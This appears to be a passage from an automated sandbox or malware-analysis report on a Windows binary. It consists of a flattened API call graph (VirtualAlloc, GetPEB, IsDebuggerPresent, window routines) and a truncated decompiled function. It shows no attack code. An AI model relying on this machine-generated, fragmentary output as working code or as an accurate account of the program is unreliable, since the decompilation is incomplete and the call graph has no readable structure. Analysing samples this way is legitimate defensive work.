CopyRect 42943->43381 42946 41167e 42946->42846 43424 422111 42948->43424 42952 420aec ctype 106 API calls 42951->42952 42953 40edaa 42952->42953 42954 40edb3 42953->42954 43463 406436 2 API calls 4 library calls 42953->43463 42958 40ccc8 2 API calls 42954->42958 43462 404644 DefMDIChildProcA 42954->43462 42956 40edc6 42956->42846 42958->42956 42960 4110d0 __EH_prolog3 42959->42960 42961 411155 42960->42961 42962 411145 42960->42962 42964 4110ec 42960->42964 42967 41115a 42961->42967 42974 41116e 42961->42974 42965 40ee3c ~_Task_impl 113 API calls 42962->42965 42963 411138 43496 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 42963->43496 42964->42963 43021 411102 42964->43021 42968 41114b 42965->42968 43492 410af5 121 API 
calls 2 library calls 42967->43492 43491 410a7d 120 API calls 42968->43491 42969 4112e0 std::_Locinfo::~_Locinfo 42969->42846 42972 41116a 42972->42974 42972->43021 42974->43021 43464 40d713 42974->43464 42975 41167e 42975->42846 42978 4112c5 43495 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 42978->43495 42981 41121d 43032 4134c3 140 API calls 42981->43032 42982 41120c 42982->42963 42982->42978 42982->42981 42984 4114b7 42982->42984 42985 411342 42982->42985 42986 4114c4 42982->42986 42987 411506 42982->42987 42988 411302 42982->42988 42989 41148d 42982->42989 42990 411350 42982->42990 42991 411498 42982->42991 42992 41141b 42982->42992 42993 41131a 42982->42993 42994 4114a2 42982->42994 42995 4114e4 42982->42995 42996 411326 42982->42996 42997 411472 42982->42997 42998 4114f2 42982->42998 42999 4113f4 42982->42999 43000 4112fa 42982->43000 43010 41164a 42982->43010 43011 41145c 42982->43011 43016 41142a 42982->43016 42982->43021 43025 4113bd 42982->43025 43494 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 42982->43494 43017 40ee3c ~_Task_impl 113 API calls 42984->43017 43007 40ee3c ~_Task_impl 113 API calls 42985->43007 43018 40ee3c ~_Task_impl 113 API calls 42986->43018 43019 40ee3c ~_Task_impl 113 API calls 42987->43019 42987->43021 43035 40ed96 109 API calls 42988->43035 43470 404801 42988->43470 43473 40547d 42988->43473 43505 422d89 112 API calls ctype 42989->43505 43498 40d77c 112 API calls 42990->43498 43005 41f4e8 112 API calls 42991->43005 43013 41f4e8 112 API calls 42992->43013 43002 40ee3c ~_Task_impl 113 API calls 42993->43002 43006 41f4e8 112 API calls 42994->43006 43008 40ee3c ~_Task_impl 113 API calls 42995->43008 43004 40ee3c ~_Task_impl 113 API calls 42996->43004 43001 40ee3c ~_Task_impl 113 API calls 42997->43001 43009 40ee3c ~_Task_impl 113 API calls 42998->43009 43012 40ee3c ~_Task_impl 113 API calls 42999->43012 43497 422d89 112 API calls ctype 43000->43497 43015 41147a 43001->43015 43002->43021 43004->43021 
43005->43016 43006->43011 43007->42981 43008->43021 43009->43011 43506 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 43010->43506 43486 4050e4 43011->43486 43012->43021 43013->43021 43022 40ee3c ~_Task_impl 113 API calls 43015->43022 43478 4074cb 43016->43478 43483 41324e 43016->43483 43017->43016 43018->43011 43019->43011 43507 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 43021->43507 43022->43011 43024 41136a 43026 40ee68 112 API calls 43024->43026 43500 422e06 43025->43500 43027 41137c 43026->43027 43029 411392 43027->43029 43030 424500 ~_Task_impl 2 API calls 43027->43030 43499 40f76d 113 API calls 4 library calls 43029->43499 43030->43029 43032->43021 43035->43021 43040 40ccd7 43039->43040 43041 40ccf9 CallWindowProcA 43039->43041 43040->43041 43043 40cce5 DefWindowProcA 43040->43043 43042 40cd0c 43041->43042 43042->42847 43043->43042 43044->42847 43045->42847 43047 40a59a 43046->43047 43048 40a59f 43046->43048 43123 406436 2 API calls 4 library calls 43047->43123 43113 408bca 43048->43113 43052 406d2e 43207 407991 43052->43207 43055 406e6a 43056 41f363 ctype 112 API calls 43055->43056 43057 406e79 FindResourceA 43056->43057 43058 406e92 43057->43058 43062 4011ce 43057->43062 43241 406b0c 83 API calls 2 library calls 43058->43241 43060 406e9b 43242 4065d7 GetObjectA DeleteObject LocalAlloc RaiseException ctype 43060->43242 43062->42924 43063 406673 43062->43063 43064 40669e _memset 43063->43064 43065 406756 43064->43065 43066 412b38 GetWindowLongA 43064->43066 43067 430650 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 43065->43067 43066->43064 43068 4011e0 43067->43068 43068->42924 43069 40b7a6 43068->43069 43243 40b954 43069->43243 43072 40c1d8 43073 40c1e4 __EH_prolog3 43072->43073 43250 40bdcd 43073->43250 43076 40c2b8 std::_Locinfo::~_Locinfo 43076->42932 43077 40c2ad 43262 40bf7c 85 API calls 3 library calls 43077->43262 43078 40c20d SendMessageA 43256 422e1f 113 API calls 2 library calls 43078->43256 43081 40c225 
43091 40c238 43081->43091 43257 40b938 SelectObject 43081->43257 43083 40c289 43084 40c29e 43083->43084 43260 40b938 SelectObject 43083->43260 43261 422e73 114 API calls 3 library calls 43084->43261 43087 40c2c3 GetSystemMetrics 43087->43091 43088 40c2aa 43088->43077 43089 402720 118 API calls 43089->43091 43091->43083 43091->43087 43091->43089 43258 40bd78 GetTextExtentPoint32A 43091->43258 43259 40be87 82 API calls 3 library calls 43091->43259 43094 413282 __EH_prolog3 43093->43094 43095 404461 std::ios_base::_Init 69 API calls 43094->43095 43098 4132a0 43094->43098 43095->43098 43096 4132d0 std::_Locinfo::~_Locinfo 43096->42934 43097 4132c4 GetParent 43097->43096 43098->43096 43098->43097 43100 412f39 __EH_prolog3 43099->43100 43101 412fb6 std::_Locinfo::~_Locinfo 43100->43101 43103 404461 std::ios_base::_Init 69 API calls 43100->43103 43274 409833 43100->43274 43279 41346c 43100->43279 43287 4133f9 113 API calls 2 library calls 43100->43287 43288 42280e RaiseException __CxxThrowException@8 43100->43288 43101->42936 43103->43100 43108 412fd5 43107->43108 43109 412fcd 43107->43109 43295 412e38 43108->43295 43110 409833 3 API calls 43109->43110 43110->43108 43114 40ed96 109 API calls 43113->43114 43115 408bd7 43114->43115 43116 40118d 43115->43116 43124 408ba3 43115->43124 43128 4085ab 43115->43128 43133 404cb4 43115->43133 43116->42922 43116->43052 43117 408bf1 43117->43116 43118 408bf5 PostMessageA 43117->43118 43140 409c7d 43118->43140 43123->43048 43125 408baf 43124->43125 43127 408bbf 43124->43127 43125->43127 43153 408b24 43125->43153 43127->43117 43129 4085c2 43128->43129 43130 4085b6 GetMenu 43128->43130 43165 41f4e8 43129->43165 43130->43129 43132 4085d7 43132->43117 43134 404cc3 GetMenuItemCount 43133->43134 43135 404cde 43133->43135 43178 4049db 113 API calls 43134->43178 43168 404cf2 43135->43168 43141 409d42 43140->43141 43142 409c97 43140->43142 43141->43116 43179 412b38 43142->43179 43144 409cd0 43145 409d44 43144->43145 43146 409cd9 43144->43146 
43182 40f201 43145->43182 43148 40f201 128 API calls 43146->43148 43149 409d02 43148->43149 43150 40f201 128 API calls 43149->43150 43151 409d1c 43150->43151 43203 412d05 43151->43203 43154 408b3b 43153->43154 43155 406436 ~_Task_impl LocalAlloc RaiseException 43154->43155 43156 408b46 43154->43156 43155->43154 43157 41e928 LocalAlloc RaiseException 43156->43157 43158 408b4b 43157->43158 43159 408b51 43158->43159 43164 4185a1 453 API calls 43158->43164 43159->43127 43160 408b7a 43160->43159 43161 412b52 GetWindowLongA 43160->43161 43162 408b85 43161->43162 43162->43159 43163 412b98 GetWindowLongA SetWindowLongA SetWindowPos 43162->43163 43163->43159 43164->43160 43166 41f474 moneypunct 112 API calls 43165->43166 43167 41f4f4 43166->43167 43169 404d0e 43168->43169 43170 404d3e 43169->43170 43171 412b6c GetWindowLongA SetWindowLongA SetWindowPos 43169->43171 43172 41f363 ctype 112 API calls 43170->43172 43171->43170 43173 404d43 43172->43173 43174 40492c 115 API calls 43173->43174 43175 404d68 43174->43175 43176 404d7c BringWindowToTop 43175->43176 43177 404ced 43175->43177 43176->43177 43177->43117 43178->43135 43180 412b4a 43179->43180 43181 412b3e GetWindowLongA 43179->43181 43181->43144 43183 40f226 43182->43183 43184 40f22f GetClientRect 43182->43184 43185 40f259 43183->43185 43186 40f24c BeginDeferWindowPos 43183->43186 43184->43183 43187 40f25d GetTopWindow 43185->43187 43186->43187 43196 40f279 43187->43196 43188 40f2b1 43190 40f2e1 43188->43190 43191 40f2b7 43188->43191 43189 40f26a GetDlgCtrlID 43192 40ee68 112 API calls 43189->43192 43195 40f338 43190->43195 43199 40ee3c ~_Task_impl 113 API calls 43190->43199 43193 40f2cb 43191->43193 43194 40f2bc CopyRect 43191->43194 43192->43196 43193->43141 43194->43193 43195->43193 43197 40f33d KiUserCallbackDispatcher 43195->43197 43196->43188 43196->43189 43198 40f2a2 GetWindow 43196->43198 43200 40f291 SendMessageA 43196->43200 43197->43193 43198->43196 43201 40f2f3 43199->43201 43200->43198 43201->43195 43202 
40cee2 7 API calls 43201->43202 43202->43195 43204 412d10 SetWindowPos 43203->43204 43205 412d37 43203->43205 43204->43141 43208 4079a6 43207->43208 43209 411f96 126 API calls 43208->43209 43210 4079d0 43209->43210 43221 40791d 43210->43221 43217 4011ba 43217->42924 43217->43055 43218 407a0f 43240 406db6 IsWindow SendMessageA SendMessageA SendMessageA InvalidateRect 43218->43240 43220 407a2e 43220->43217 43222 40798f 43221->43222 43223 40792f 43221->43223 43229 4064f0 43222->43229 43224 41f363 ctype 112 API calls 43223->43224 43225 407936 43224->43225 43226 407887 ctype 2 API calls 43225->43226 43227 407940 GetProcAddress 43226->43227 43228 407957 _memset 43227->43228 43228->43222 43230 406505 GetDC GetSystemMetrics CreateFontA 43229->43230 43231 406588 SetRectEmpty 43229->43231 43232 406551 GetCharWidthA 43230->43232 43233 406548 SelectObject 43230->43233 43236 40d84a 43231->43236 43234 406576 ReleaseDC 43232->43234 43235 406567 SelectObject DeleteObject 43232->43235 43233->43232 43234->43231 43235->43234 43237 40d859 43236->43237 43239 410f67 118 API calls 43237->43239 43238 407a0b 43238->43217 43238->43218 43239->43238 43240->43220 43241->43060 43242->43062 43244 412b38 GetWindowLongA 43243->43244 43245 40b983 43244->43245 43246 411f96 126 API calls 43245->43246 43247 40b99a SetRectEmpty 43246->43247 43248 40d84a 118 API calls 43247->43248 43249 401206 43248->43249 43249->42930 43249->43072 43251 40bde1 ctype 43250->43251 43263 420da0 43251->43263 43253 40be28 43253->43076 43253->43077 43253->43078 43254 40be03 43254->43253 43255 4014c0 ctype 82 API calls 43254->43255 43255->43254 43256->43081 43257->43091 43258->43091 43259->43091 43260->43084 43261->43088 43262->43076 43266 420db3 43263->43266 43265 420dd9 43270 420de9 43265->43270 43273 4316f6 69 API calls 6 library calls 43265->43273 43266->43265 43267 420dd0 43266->43267 43271 406436 2 API calls 4 library calls 43266->43271 43272 434693 69 API calls 2 library calls 43267->43272 43270->43254 43271->43266 
43272->43265 43273->43270 43275 409843 43274->43275 43276 40983f 43274->43276 43275->43276 43289 408692 43275->43289 43276->43100 43280 413482 43279->43280 43281 41347d 43279->43281 43283 411f96 126 API calls 43280->43283 43294 406436 2 API calls 4 library calls 43281->43294 43284 413497 SetRectEmpty 43283->43284 43285 40d84a 118 API calls 43284->43285 43286 4134be 43285->43286 43286->43100 43287->43100 43290 4086a0 43289->43290 43291 4086a5 GetDlgCtrlID 43289->43291 43293 406436 2 API calls 4 library calls 43290->43293 43291->43275 43291->43276 43293->43291 43294->43280 43299 412e45 43295->43299 43297 412e87 43302 414166 43297->43302 43299->43297 43301 409833 3 API calls 43299->43301 43349 406436 2 API calls 4 library calls 43299->43349 43301->43299 43303 414198 43302->43303 43305 4141a1 GetWindowRect 43303->43305 43370 406436 2 API calls 4 library calls 43303->43370 43306 4141e0 43305->43306 43307 4141b9 43305->43307 43309 41423c 43306->43309 43350 412d87 43306->43350 43308 4141c5 EqualRect 43307->43308 43348 414422 43307->43348 43308->43306 43308->43348 43371 420d66 115 API calls 43309->43371 43310 430650 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 43312 401240 43310->43312 43312->42846 43313 41422d 43359 41fc5a 43313->43359 43316 414270 43317 41427e IsWindowVisible 43316->43317 43326 41429c 43316->43326 43320 41428b 43317->43320 43317->43326 43318 4142b9 43372 413342 CopyRect 43318->43372 43319 41436e 43375 4133a2 71 API calls 43319->43375 43323 412d05 SetWindowPos 43320->43323 43323->43326 43324 4142ca 43373 422bfb GetWindowLongA ScreenToClient ScreenToClient 43324->43373 43325 41437a 43376 4133a2 71 API calls 43325->43376 43326->43318 43326->43319 43329 4142d8 43374 41365c 75 API calls 2 library calls 43329->43374 43330 414386 43332 412d05 SetWindowPos 43330->43332 43334 4143a5 GetParent 43332->43334 43333 414326 43336 412d05 SetWindowPos 43333->43336 43335 40ee3c ~_Task_impl 113 API calls 43334->43335 43337 4143b4 43335->43337 43338 414364 
43336->43338 43341 4143c0 43337->43341 43377 4133d6 114 API calls ~_Task_impl 43337->43377 43338->43334 43340 4143f7 43343 414413 43340->43343 43344 412d05 SetWindowPos 43340->43344 43341->43340 43378 413a2c 117 API calls 2 library calls 43341->43378 43379 4139c3 72 API calls ctype 43343->43379 43344->43343 43346 41441b 43380 408487 114 API calls ~_Task_impl 43346->43380 43348->43310 43349->43299 43351 412d93 __EH_prolog3 43350->43351 43352 412d9b GetWindowTextA 43351->43352 43353 412dac 43351->43353 43358 412df0 ctype std::_Locinfo::~_Locinfo 43352->43358 43354 4014c0 ctype 82 API calls 43353->43354 43355 412db4 43354->43355 43356 4048ed ctype 79 API calls 43355->43356 43357 412dd7 lstrlenA 43356->43357 43357->43358 43358->43313 43360 41fc7c 43359->43360 43361 406436 ~_Task_impl LocalAlloc RaiseException 43360->43361 43362 41fc85 lstrlenA 43360->43362 43361->43360 43363 41fca8 _memset 43362->43363 43364 41fcb4 GetWindowTextA 43363->43364 43365 41fcd9 SetWindowTextA 43363->43365 43364->43365 43366 41fcc7 lstrcmpA 43364->43366 43367 41fce1 43365->43367 43366->43365 43366->43367 43368 430650 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 43367->43368 43369 41fcee 43368->43369 43369->43309 43370->43303 43371->43316 43372->43324 43373->43329 43374->43333 43375->43325 43376->43330 43377->43341 43378->43340 43379->43346 43380->43348 43385 4217b7 43381->43385 43384 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 43384->42946 43386 4217cf 43385->43386 43387 411663 43386->43387 43388 4217e8 CopyRect 43386->43388 43387->43384 43389 421819 43388->43389 43393 420e08 43389->43393 43397 413b62 43393->43397 43396 40cee2 7 API calls 43396->43387 43399 413b76 43397->43399 43398 406436 ~_Task_impl LocalAlloc RaiseException 43398->43399 43399->43398 43400 413b89 IsRectEmpty 43399->43400 43402 40f898 ~_Task_impl 114 API calls 43399->43402 43403 413bcb GetClientRect 43399->43403 43400->43399 43401 413b9a 43400->43401 43404 413bf9 BeginDeferWindowPos 43401->43404 
43420 413bf3 43401->43420 43402->43399 43403->43401 43404->43420 43405 413fd5 43407 413ff2 SetRectEmpty 43405->43407 43408 413fe9 KiUserCallbackDispatcher 43405->43408 43406 413638 ctype LocalAlloc RaiseException 43406->43420 43409 41400d 43407->43409 43408->43407 43409->43387 43409->43396 43410 413cb5 GetWindowRect 43411 422bfb GetWindowLongA ScreenToClient ScreenToClient 43410->43411 43411->43420 43412 413e35 OffsetRect 43412->43420 43413 413cec OffsetRect 43413->43420 43414 413e84 OffsetRect 43418 413ed3 EqualRect 43414->43418 43415 413d3f OffsetRect 43417 413d5c EqualRect 43415->43417 43416 413e6e OffsetRect 43416->43420 43417->43420 43418->43420 43419 413d25 OffsetRect 43419->43420 43420->43405 43420->43406 43420->43410 43420->43412 43420->43413 43420->43414 43420->43415 43420->43416 43420->43417 43420->43418 43420->43419 43421 40b917 LocalAlloc RaiseException ctype 43420->43421 43422 40cee2 7 API calls 43420->43422 43423 4260f4 71 API calls 43420->43423 43421->43420 43422->43420 43423->43420 43425 412b38 GetWindowLongA 43424->43425 43426 422120 43425->43426 43427 42216a 43426->43427 43428 412d05 SetWindowPos 43426->43428 43429 412b38 GetWindowLongA 43427->43429 43428->43427 43431 422171 43429->43431 43430 4221be 43430->42846 43431->43430 43432 412b38 GetWindowLongA 43431->43432 43434 422184 43431->43434 43432->43434 43433 410293 114 API calls 43435 42218f 43433->43435 43434->43430 43434->43433 43437 4221aa 43435->43437 43448 40f898 114 API calls ~_Task_impl 43435->43448 43437->43430 43439 4077c6 43437->43439 43444 4077e8 43439->43444 43440 40786b 43455 40fbd2 264 API calls 3 library calls 43440->43455 43442 407876 43443 430650 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 43442->43443 43445 407883 43443->43445 43444->43440 43446 41246b 251 API calls 43444->43446 43449 412611 43444->43449 43445->43430 43446->43444 43448->43437 43450 412672 43449->43450 43451 412625 43449->43451 43450->43444 43451->43450 43453 41263c 43451->43453 43461 406436 2 API 
calls 4 library calls 43451->43461 43453->43450 43456 40773c 43453->43456 43455->43442 43457 40684f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 43456->43457 43458 407759 43457->43458 43459 40705f 15 API calls 43458->43459 43460 407779 43459->43460 43460->43450 43461->43453 43462->42956 43463->42954 43465 40d725 43464->43465 43466 40d73d 43465->43466 43518 406436 2 API calls 4 library calls 43465->43518 43508 424385 43466->43508 43469 40d743 43469->42982 43493 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 43469->43493 43471 408bca 453 API calls 43470->43471 43472 404814 43471->43472 43472->43021 43474 40ed96 109 API calls 43473->43474 43475 40548a 43474->43475 43476 4054ac 43475->43476 43477 40549a SetWindowLongA 43475->43477 43476->43021 43477->43476 43521 42143d DefWindowProcA 43478->43521 43481 40750b 43481->43021 43482 4074fe InvalidateRect 43482->43481 43484 42143d 10 API calls 43483->43484 43485 41326e 43484->43485 43485->43021 43528 409dd7 43486->43528 43490 405101 43490->43021 43491->42961 43492->42972 43493->42982 43494->42982 43495->42963 43496->42969 43498->43024 43499->43025 43501 422e12 43500->43501 43502 422e1e 43500->43502 43534 422dd3 43501->43534 43502->43021 43504 422e17 DeleteDC 43504->43502 43506->42981 43507->42975 43509 424395 43508->43509 43510 42439a 43508->43510 43519 406436 2 API calls 4 library calls 43509->43519 43512 4243a8 43510->43512 43520 42431c InitializeCriticalSection 43510->43520 43514 4243e4 EnterCriticalSection 43512->43514 43515 4243ba EnterCriticalSection 43512->43515 43514->43469 43516 4243c6 InitializeCriticalSection 43515->43516 43517 4243d9 LeaveCriticalSection 43515->43517 43516->43517 43517->43514 43518->43465 43519->43510 43520->43512 43522 4074ee 43521->43522 43523 421464 GetWindowRect 43521->43523 43522->43481 43522->43482 43524 421491 43523->43524 43525 4214ed 43523->43525 43524->43525 43526 42149d SetRect InvalidateRect SetRect 
InvalidateRect 43524->43526 43525->43522 43527 4214fd SetRect InvalidateRect SetRect InvalidateRect 43525->43527 43526->43525 43527->43522 43529 40ed96 109 API calls 43528->43529 43530 409de4 43529->43530 43531 4050fa 43530->43531 43532 409c7d 130 API calls 43530->43532 43533 40474e 115 API calls ~_Task_impl 43531->43533 43532->43531 43533->43490 43535 422de0 43534->43535 43537 422de7 ctype 43534->43537 43538 422d15 112 API calls 4 library calls 43535->43538 43537->43504 43538->43537 43549 4014f0 43539->43549 43541 429320 GetShortPathNameA 43542 429333 43541->43542 43543 429341 43541->43543 43551 402830 82 API calls ctype 43542->43551 43545 40a356 82 API calls 43543->43545 43546 42934a 43545->43546 43547 430650 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 43546->43547 43548 416ac5 PathFindFileNameA 43547->43548 43548->42348 43550 40150d ctype 43549->43550 43550->43541 43551->43543 43552->42356 43553 44d144 43558 4498f9 43553->43558 43559 41f363 ctype 112 API calls 43558->43559 43560 449903 43559->43560 43561 449914 43560->43561 43566 438d85 113 API calls 9 library calls 43560->43566 43563 430b0e 43561->43563 43567 430ad2 43563->43567 43565 430b1b 43566->43561 43568 430ade __lseeki64 43567->43568 43575 4339cb 43568->43575 43574 430aff __lseeki64 43574->43565 43601 43a0bf 43575->43601 43577 430ae3 43578 4309e7 43577->43578 43610 435eef TlsGetValue 43578->43610 43581 435eef __decode_pointer 7 API calls 43582 430a0b 43581->43582 43583 430a8e 43582->43583 43622 4344b4 70 API calls 4 library calls 43582->43622 43598 430b08 43583->43598 43585 430a29 43586 430a75 43585->43586 43589 430a53 43585->43589 43590 430a44 43585->43590 43587 435e74 __encode_pointer 7 API calls 43586->43587 43588 430a83 43587->43588 43591 435e74 __encode_pointer 7 API calls 43588->43591 43589->43583 43593 430a4d 43589->43593 43623 438222 75 API calls _realloc 43590->43623 43591->43583 43593->43589 43596 430a69 43593->43596 43624 438222 75 API calls _realloc 43593->43624 43595 430a63 
43595->43583 43595->43596 43625 435e74 TlsGetValue 43596->43625 43639 4339d4 43598->43639 43602 43a0e7 EnterCriticalSection 43601->43602 43603 43a0d4 43601->43603 43602->43577 43608 439ffc 69 API calls 9 library calls 43603->43608 43605 43a0da 43605->43602 43609 43395f 69 API calls 3 library calls 43605->43609 43607 43a0e6 43607->43602 43608->43605 43609->43607 43611 435f07 43610->43611 43612 435f28 GetModuleHandleW 43610->43612 43611->43612 43613 435f11 TlsGetValue 43611->43613 43614 435f43 GetProcAddress 43612->43614 43615 435f38 43612->43615 43619 435f1c 43613->43619 43621 435f20 43614->43621 43637 43392f Sleep GetModuleHandleW 43615->43637 43617 435f53 RtlDecodePointer 43618 4309fb 43617->43618 43618->43581 43619->43612 43619->43621 43620 435f3e 43620->43614 43620->43618 43621->43617 43621->43618 43622->43585 43623->43593 43624->43595 43626 435ead GetModuleHandleW 43625->43626 43627 435e8c 43625->43627 43629 435ec8 GetProcAddress 43626->43629 43630 435ebd 43626->43630 43627->43626 43628 435e96 TlsGetValue 43627->43628 43634 435ea1 43628->43634 43636 435ea5 43629->43636 43638 43392f Sleep GetModuleHandleW 43630->43638 43632 435ee0 43632->43586 43633 435ed8 RtlEncodePointer 43633->43632 43634->43626 43634->43636 43635 435ec3 43635->43629 43635->43632 43636->43632 43636->43633 43637->43620 43638->43635 43642 439fe5 LeaveCriticalSection 43639->43642 43641 430b0d 43641->43574 43642->43641 43643 40f720 43644 40f733 43643->43644 43650 40f72e 43643->43650 43645 40ee68 112 API calls 43644->43645 43646 40f73d 43645->43646 43647 40f758 DefWindowProcA 43646->43647 43648 40f746 43646->43648 43647->43650 43649 40f62d 453 API calls 43648->43649 43649->43650 43651 4037c0 43688 403130 43651->43688 43662 4035a0 112 API calls 43663 403811 43662->43663 43664 403690 108 API calls 43663->43664 43665 40381a 43664->43665 43666 4035a0 112 API calls 43665->43666 43667 40382b 43666->43667 43668 403690 108 API calls 43667->43668 43669 403834 43668->43669 43670 4035a0 112 API calls 
43669->43670 43671 403845 43670->43671 43672 403690 108 API calls 43671->43672 43673 40384e 43672->43673 43721 402ef0 LoadStringW 43673->43721 43675 403884 43726 430d56 43675->43726 43678 4035a0 112 API calls 43679 4038aa 43678->43679 43680 403690 108 API calls 43679->43680 43681 4038b3 ctype 43680->43681 43682 4038cb VirtualAlloc 43681->43682 43683 4038f7 __setlocale_set_cat 43682->43683 43684 402ef0 71 API calls 43683->43684 43685 403908 43684->43685 43730 403700 108 API calls std::ios_base::_Init 43685->43730 43687 403920 ctype 43689 403166 43688->43689 43731 402fd0 43689->43731 43691 40326d 43737 4030c0 43691->43737 43696 403340 43697 402fd0 71 API calls 43696->43697 43698 403380 43697->43698 43700 403388 43698->43700 43747 448692 43698->43747 43699 403432 43701 4030c0 71 API calls 43699->43701 43700->43699 43773 402d20 70 API calls 3 library calls 43700->43773 43703 403441 43701->43703 43705 402f80 43703->43705 43706 402f94 43705->43706 43707 402fcb 43706->43707 43860 402d20 70 API calls 3 library calls 43706->43860 43709 4035a0 43707->43709 43861 401af0 GetPEB 43709->43861 43711 4035cc ctype 43712 402ef0 71 API calls 43711->43712 43715 430d56 80 API calls 43711->43715 43716 4035df 43711->43716 43862 430fcd 80 API calls 2 library calls 43711->43862 43863 403470 43711->43863 43712->43711 43715->43711 43717 403690 43716->43717 43718 4036dd 43717->43718 43720 4036c2 43717->43720 43718->43662 43719 403470 108 API calls 43719->43720 43720->43718 43720->43719 43722 402f16 43721->43722 43723 402f3e 43721->43723 43870 402ab0 70 API calls 2 library calls 43722->43870 43723->43675 43725 402f38 43725->43675 43727 430d40 43726->43727 43871 43882f 43727->43871 43730->43687 43732 403014 43731->43732 43733 40300c 43731->43733 43735 403037 43732->43735 43736 402f80 70 API calls 43732->43736 43744 4474d7 EnterCriticalSection std::_Lockit::_Lockit 43733->43744 43735->43691 43743 402d20 70 API calls 3 library calls 43735->43743 43736->43735 43738 4030f5 43737->43738 43740 403100 
43738->43740 43745 403060 70 API calls 43738->43745 43741 40311f 43740->43741 43746 4474e0 LeaveCriticalSection _tidy_global 43740->43746 43741->43696 43743->43691 43744->43732 43745->43740 43746->43741 43748 44869e __EH_prolog3_GS 43747->43748 43750 4486a8 43748->43750 43752 4486fa 43748->43752 43753 4486eb 43748->43753 43777 431b87 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 43750->43777 43778 448494 70 API calls 2 library calls 43752->43778 43774 447f97 43753->43774 43756 448708 43779 44818f 7 API calls ctype 43756->43779 43758 448717 43780 44794f 7 API calls ctype 43758->43780 43760 44871e 43781 44818f 7 API calls ctype 43760->43781 43762 44872f 43782 44794f 7 API calls ctype 43762->43782 43764 448810 43765 447f97 _Fputc 105 API calls 43764->43765 43767 44880e 43764->43767 43765->43767 43785 402090 69 API calls 2 library calls 43767->43785 43770 44794f 7 API calls ctype 43772 448736 43770->43772 43771 44818f 7 API calls ctype 43771->43772 43772->43764 43772->43767 43772->43770 43772->43771 43783 449e18 105 API calls 3 library calls 43772->43783 43784 448268 70 API calls 3 library calls 43772->43784 43773->43699 43786 449aac 43774->43786 43776 447fa9 43776->43750 43778->43756 43779->43758 43780->43760 43781->43762 43782->43772 43783->43772 43784->43772 43785->43767 43787 449ab8 __lseeki64 43786->43787 43788 449aeb 43787->43788 43789 449acb 43787->43789 43805 440114 43788->43805 43832 431d3e 69 API calls __getptd_noexit 43789->43832 43792 449ad0 43833 4367e9 7 API calls 2 library calls 43792->43833 43795 449b6b 43797 449b7c 43795->43797 43811 43681f 43795->43811 43842 449bb0 LeaveCriticalSection LeaveCriticalSection _setvbuf 43797->43842 43800 449ae0 __lseeki64 43800->43776 43803 449b5b 43841 4367e9 7 API calls 2 library calls 43803->43841 43806 440126 43805->43806 43807 440148 EnterCriticalSection 43805->43807 43806->43807 43809 44012e 43806->43809 43808 44013e 43807->43808 43808->43795 43834 4401f2 43808->43834 43810 43a0bf __lock 69 API calls 

                  Executed Functions

                  C-Code - Quality: 76%
                  			E004016F0(void* __ecx, void* __edx, void* __ebp) {
                  				int _v8;
                  				char _v12;
                  				signed int _v32;
                  				signed int _v36;
                  				signed int _v40;
                  				signed int _v44;
                  				void* _v48;
                  				intOrPtr _v60;
                  				void* _v64;
                  				char _v80;
                  				char _v84;
                  				void* _v88;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t26;
                  				intOrPtr* _t31;
                  				intOrPtr* _t32;
                  				intOrPtr* _t34;
                  				intOrPtr _t35;
                  				intOrPtr* _t36;
                  				intOrPtr* _t42;
                  				long _t52;
                  				signed int _t54;
                  				signed int _t55;
                  				void* _t81;
                  				intOrPtr* _t86;
                  				void* _t91;
                  				void* _t96;
                  				signed int _t97;
                  				void* _t98;
                  
                  				_t81 = __edx;
                  				_push(0xffffffff);
                  				_push(E0044A85C);
                  				_push( *[fs:0x0]);
                  				_t97 = _t96 - 0x2c;
                  				_push(_t54);
                  				_t26 =  *0x463404; // 0x38a11573
                  				_push(_t26 ^ _t97);
                  				 *[fs:0x0] =  &_v12;
                  				_t91 = __ecx;
                  				_t85 = GetVersion;
                  				if(GetVersion() >= 0) {
                  					L4:
                  					E00414CC5(_t54, _t91, _t81, _t85, _t91, __eflags, 4); // executed
                  					_t31 = E00404461(__eflags, 0x90);
                  					_t98 = _t97 + 4;
                  					_v60 = _t31;
                  					_v8 = 0;
                  					__eflags = _t31;
                  					if(__eflags == 0) {
                  						_t32 = 0;
                  						__eflags = 0;
                  					} else {
                  						_push(0x44eccc);
                  						_push(0x44f424);
                  						_push(0x44f10c);
                  						_push(0x81);
                  						_t32 = E004172AA(_t54, _t31, _t81, _t85, _t91, __eflags);
                  					}
                  					_t55 = _t54 | 0xffffffff;
                  					_push(_t32);
                  					 *(_t98 + 0x48) = _t55;
                  					E00416787(_t55, _t91, _t85, _t91, __eflags);
                  					_t34 = E00404461(__eflags, 0x248);
                  					_t97 = _t98 + 4;
                  					_v60 = _t34;
                  					_v8 = 1;
                  					__eflags = _t34;
                  					if(_t34 == 0) {
                  						_t86 = 0;
                  						__eflags = 0;
                  					} else {
                  						_t86 = E00401380();
                  					}
                  					_t35 =  *_t86;
                  					_t82 =  *((intOrPtr*)(_t35 + 0x140));
                  					_v8 = _t55;
                  					_t36 =  *((intOrPtr*)( *((intOrPtr*)(_t35 + 0x140))))(0x80, 0xcf8000, 0, 0); // executed
                  					__eflags = _t36;
                  					if(__eflags == 0) {
                  						goto L3;
                  					} else {
                  						 *((intOrPtr*)(_t91 + 0x20)) = _t86;
                  						E00416A7E(_t55, _t91, _t82, _t86, _t91, __eflags); // executed
                  						_push(1);
                  						E004165C6(); // executed
                  						E0041576C(_t97 + 0x14, __eflags);
                  						 *((intOrPtr*)(_t97 + 0x48)) = 2;
                  						E00414D4B(_t97 + 0x14);
                  						_push( &_v80);
